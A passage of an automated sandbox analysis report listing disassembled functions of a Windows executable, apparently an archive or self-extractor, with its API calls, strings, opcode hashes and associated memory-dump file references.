_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019C9FE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019CA0A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019CA16
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019CA1C

Strings

, xrefs: 00007FF7C019C4FA
, xrefs: 00007FF7C019C691

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: $
API String ID: 3668304517-227171996
Opcode ID: c8965c4f87891568c389f61817c83666d92bf9a7bc58ebf4ca93cead553343d7
Instruction ID: 6bcf243bea37bd0dfd48bd1f90351755e5d8a942589f0a86c667068d2b559ecc
Opcode Fuzzy Hash: c8965c4f87891568c389f61817c83666d92bf9a7bc58ebf4ca93cead553343d7
Instruction Fuzzy Hash: 6CF1AE62F1874682EE00AF65E4441BCE362AB44FB8F905631CA9D977D9DF7CF59083A0

Function 00007FF7C01A8D7C Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7C01A8F1A
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7C01A923D
abort.LIBCMT ref: 00007FF7C01A9271

Strings

csm, xrefs: 00007FF7C01A8E61
csm, xrefs: 00007FF7C01A8EC3
csm, xrefs: 00007FF7C01A8F41

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 2940173790-393685449
Opcode ID: 7ce8224d02cbc9d10e697210102f736983d510ff4da2607681883173542701a8
Instruction ID: c7118128268b7342fb8853dcead291f82721890cdef3dc2f8b86c2bd68524077
Opcode Fuzzy Hash: 7ce8224d02cbc9d10e697210102f736983d510ff4da2607681883173542701a8
Instruction Fuzzy Hash: ACE192729086828BE710AF74E4803BDF7A0EB44B68F944136DA8D97796DF38F591C790

Function 00007FF7C0191BF4 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0190AA0: CompareStringW.KERNEL32(?,?,00007FF7C0186C19), ref: 00007FF7C0190ABF

Part of subcall function 00007FF7C01812BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C01813B6

Part of subcall function 00007FF7C0190AD0: CompareStringW.KERNEL32 ref: 00007FF7C0190B36

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0191DC2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0191DC8
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7C0191E25

Strings

.zx, xrefs: 00007FF7C0191C92, 00007FF7C0191CA1
.zipx, xrefs: 00007FF7C0191C3B, 00007FF7C0191C4A
z%s%02d, xrefs: 00007FF7C0191E12

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CompareString_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskswprintf
String ID: .zipx$.zx$z%s%02d
API String ID: 2859674139-515631857
Opcode ID: 4b60fe0a4260c981502afa51fbfce4c695209fcfdf906febb7fa7c3ab58db49e
Instruction ID: 9aed520397035556e8e57a5d6c4ecb383ffdbcc5d0711f78492f57babadb548a
Opcode Fuzzy Hash: 4b60fe0a4260c981502afa51fbfce4c695209fcfdf906febb7fa7c3ab58db49e
Instruction Fuzzy Hash: 0B719362A147419AEB10EF64E4912EDF361FB44BA4F805231EA5C86B99DF38E255C390

Function 00007FF7C01AA87C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7C01AAA83,?,?,?,00007FF7C01A87EE,?,?,?,00007FF7C01A87A9), ref: 00007FF7C01AA901
GetLastError.KERNEL32(?,?,00000000,00007FF7C01AAA83,?,?,?,00007FF7C01A87EE,?,?,?,00007FF7C01A87A9), ref: 00007FF7C01AA90F
LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7C01AAA83,?,?,?,00007FF7C01A87EE,?,?,?,00007FF7C01A87A9), ref: 00007FF7C01AA939
FreeLibrary.KERNEL32(?,?,00000000,00007FF7C01AAA83,?,?,?,00007FF7C01A87EE,?,?,?,00007FF7C01A87A9), ref: 00007FF7C01AA97F
GetProcAddress.KERNEL32(?,?,00000000,00007FF7C01AAA83,?,?,?,00007FF7C01A87EE,?,?,?,00007FF7C01A87A9), ref: 00007FF7C01AA98B

Strings

api-ms-, xrefs: 00007FF7C01AA921

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 6c79a96e063dba16a1b32c7952d051ebac3d8e1187371194647d3fb8a0e2c012
Instruction ID: 6a1caaba2edad35aecad5e616d67413b906c588064dc277c64966b24d58d29b5
Opcode Fuzzy Hash: 6c79a96e063dba16a1b32c7952d051ebac3d8e1187371194647d3fb8a0e2c012
Instruction Fuzzy Hash: 1F319C61A1A64296EE12AF02B80067AF3D4BF48FB8FDA0535DD1D86791DF3CF05587A0

Function 00007FF7C01A5094 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF7C01A5003,?,?,?,00007FF7C01A53BA), ref: 00007FF7C01A50BB
GetProcAddress.KERNEL32(?,?,?,00007FF7C01A5003,?,?,?,00007FF7C01A53BA), ref: 00007FF7C01A50D8
GetProcAddress.KERNEL32(?,?,?,00007FF7C01A5003,?,?,?,00007FF7C01A53BA), ref: 00007FF7C01A50F4

Strings

AcquireSRWLockExclusive, xrefs: 00007FF7C01A50CE
ReleaseSRWLockExclusive, xrefs: 00007FF7C01A50E3
KERNEL32.DLL, xrefs: 00007FF7C01A50B4

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
Instruction ID: bcc10c21aae9d4242972a668f3436e9411a60349ace74b3c9eb3dd14552a9a4c
Opcode Fuzzy Hash: d44736b24ca49afb9e39255391aa9d684b927709e013dababe23d1481c6dad27
Instruction Fuzzy Hash: 11112AA0A1DB0383EE55AF10B98027CE291AF49FB4FC91434C81D86B50EF7CB4A486F0

Function 00007FF7C01A9278 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF7C01A92E8

Part of subcall function 00007FF7C01A87A0: abort.LIBCMT ref: 00007FF7C01A87B3

_CallSETranslator.LIBVCRUNTIME ref: 00007FF7C01A9333
abort.LIBCMT ref: 00007FF7C01A9561

Strings

MOC, xrefs: 00007FF7C01A92FC
RCC, xrefs: 00007FF7C01A9304

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
Instruction ID: aac80458c8c84349c3146b4f0f1327ad45e5e5019ed1a5431f4d9ac6384059c6
Opcode Fuzzy Hash: 72139495dcf16bb81820f3d810a7b9a0b09b4fcdb0284e32ba8cd3a939180766
Instruction Fuzzy Hash: 8291A173A087818BE711DF65E8802ADF7A0FB44BA8F54412AEE4D97B55DF38E1A1C740

Function 00007FF7C01A83FC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7C01A8427
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7C01A84BC
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF7C01A672E), ref: 00007FF7C01A850B

Strings

f, xrefs: 00007FF7C01A843A
csm, xrefs: 00007FF7C01A84A2

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
Instruction ID: aff664137ca5b6c6adedee79e158089ca0ff5e4ed5d3c638b50f13a6d02a112b
Opcode Fuzzy Hash: 11495064961466997c8733bd3dbf6db7e405d107ed00bd2b81d8cafc23c6a21f
Instruction Fuzzy Hash: 58516D32E1960287EB54EF15F444A2DE795FB44FA4F908134DE0A87748EF78F8528BA0

Function 00007FF7C019B7B8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF7C019B7FF
GetWindowRect.USER32 ref: 00007FF7C019B850
ShowWindow.USER32 ref: 00007FF7C019B926
ShowWindow.USER32 ref: 00007FF7C019B953

Strings

RarHtmlClassName, xrefs: 00007FF7C019B8DB

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Window$Show$Rect
String ID: RarHtmlClassName
API String ID: 2396740005-1658105358
Opcode ID: 82636535739392cc33cb5fe013b40dc4a28cb47cb138220786a685eab183d8d8
Instruction ID: a0114ca74aa5d499dff9686e73172cdfa4d56e23dc368f2bb8bb525ec5d981a0
Opcode Fuzzy Hash: 82636535739392cc33cb5fe013b40dc4a28cb47cb138220786a685eab183d8d8
Instruction Fuzzy Hash: 1351722261878287EA24AF25F58437EE361FB85FA0F844135DE4E86755CF3CF1458B50

Function 00007FF7C01A3994 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 00007FF7C01A3A20
REPLACEFILEDLG, xrefs: 00007FF7C01A39F4, 00007FF7C01A3A59

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
Instruction ID: accd7fa9f8580444cb1f87f028e45558380d6f55fcb72ccded3b13dfe8292ea7
Opcode Fuzzy Hash: fda320a62b1de8e0c326076fb66231056f5d4cab4133c3dd2cb0763aad417ddf
Instruction Fuzzy Hash: CF21F721A0CA8683EA10AF19B84826CE3A1EB45FA8FD44036D99DC7364DF7CF55483A0

Function 00007FF7C01AF490 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7C01AF4B0
GetProcAddress.KERNEL32 ref: 00007FF7C01AF4C6
FreeLibrary.KERNEL32 ref: 00007FF7C01AF4EB

Strings

CorExitProcess, xrefs: 00007FF7C01AF4BF
mscoree.dll, xrefs: 00007FF7C01AF4A7

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
Instruction ID: a6a113b4049fda8d3e175096c0b9cc49405efa92addd63a06bd5b825d51fa2e0
Opcode Fuzzy Hash: bbfb9acffd6a1f7f328749b5137115e28703a16519561567df947b6386454bd5
Instruction Fuzzy Hash: 24F081A1A1864682EB44AF54F49467DE360EF88FA0F840039ED0F82765CF6CE584C760

Function 00007FF7C01B7AD4 Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01B7B19

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
Instruction ID: e7447a1ed149c7d2467ed2eeed0b73cece9378e0afab1e7711693bfad0864e8f
Opcode Fuzzy Hash: 5733bc4db78c109f0175e69bb486889a5a1a9f6e1ea72f320297fc23bc50833c
Instruction Fuzzy Hash: 9E81AFA2A186138BF711AF65E4806BDEAA0BB44FA8F845135DD0E93791CF3CB645C760

Function 00007FF7C0185DB8 Relevance: 7.7, APIs: 5, Instructions: 163filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF7C0185E7B
CreateFileW.KERNEL32 ref: 00007FF7C0185EE4
SetFileTime.KERNEL32 ref: 00007FF7C0185FAC
CloseHandle.KERNEL32 ref: 00007FF7C0185FB6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0185FEC

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2398171386-0
Opcode ID: bab0ba186ad15d1c58144dd43663a300509bb5c130dd0fdd6f82b2bdd38d3274
Instruction ID: 271f0a260e51715e61c35b6d08104cecafee360e803a794203b44fd3ccd82fe3
Opcode Fuzzy Hash: bab0ba186ad15d1c58144dd43663a300509bb5c130dd0fdd6f82b2bdd38d3274
Instruction Fuzzy Hash: 6F51C762B18B414AFB50AF65F8402BDE3B1EB44BBCF814335DE1D86794DF38A2458391

Function 00007FF7C01B7448 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF7C01B7C7B), ref: 00007FF7C01B74A5
WideCharToMultiByte.KERNEL32 ref: 00007FF7C01B7581
WriteFile.KERNEL32 ref: 00007FF7C01B75A7
WriteFile.KERNEL32 ref: 00007FF7C01B75E6
GetLastError.KERNEL32 ref: 00007FF7C01B761E

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 9178f81fb76f1e31521b60b80658233a53cfb8d4cb70a9f25aa2f81663bd83bf
Instruction ID: 6e5f5901b84580e778e3dc040d416cbe5d415eed54be9ed51b2ca469b09c6f09
Opcode Fuzzy Hash: 9178f81fb76f1e31521b60b80658233a53cfb8d4cb70a9f25aa2f81663bd83bf
Instruction Fuzzy Hash: 1851D472A14A518AF710DF25E4847ADFBB0BB48BA8F445135DE4E87B98DF38E241C760

Function 00007FF7C01B28A4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7C01B29C6

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 883fb41bd9703dcc10221343c29cb9d071b7ea0fa4d80864beb1efdaf450b773
Instruction ID: 87538afb684abdab70b2f0f8ba72c6bf31815098219f808c60839781f26e13b6
Opcode Fuzzy Hash: 883fb41bd9703dcc10221343c29cb9d071b7ea0fa4d80864beb1efdaf450b773
Instruction Fuzzy Hash: 3741BFA2B1961287FA15AF12B804679E391BB58FF0F994535DE1DCB784DF3CF04886A0

Function 00007FF7C01B8BE8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7C01B8C0F
_set_statfp.LIBCMT ref: 00007FF7C01B8C2A
_set_statfp.LIBCMT ref: 00007FF7C01B8C46
_set_statfp.LIBCMT ref: 00007FF7C01B8C82

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction ID: ee524db426f40c55a2f41336d686b48d816e900e285695e7803c229d148e905b
Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
Instruction Fuzzy Hash: 451190F6E19A0307FA943924F4923BDC8416F54FB0E884630EE6D827E68F6C744182F1

Function 00007FF7C01A97EC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7C01A9816
abort.LIBCMT ref: 00007FF7C01A9A7A

Strings

csm, xrefs: 00007FF7C01A99AA
csm, xrefs: 00007FF7C01A983B

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: __except_validate_context_recordabort
String ID: csm$csm
API String ID: 746414643-3733052814
Opcode ID: 205f847729b879f197fb1e88d311058e954f7365dfacaef904bdf3b3c6f6727b
Instruction ID: aa53282b77733ab491752b4a671fa538338b6883b56046a9fcbfede65998357d
Opcode Fuzzy Hash: 205f847729b879f197fb1e88d311058e954f7365dfacaef904bdf3b3c6f6727b
Instruction Fuzzy Hash: DB7182726086C18BDB61AF25E48077DFAA0EB05FA4F548136DA4D87B85CB3CE5A1C790

Function 00007FF7C01AB54C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C01AB573
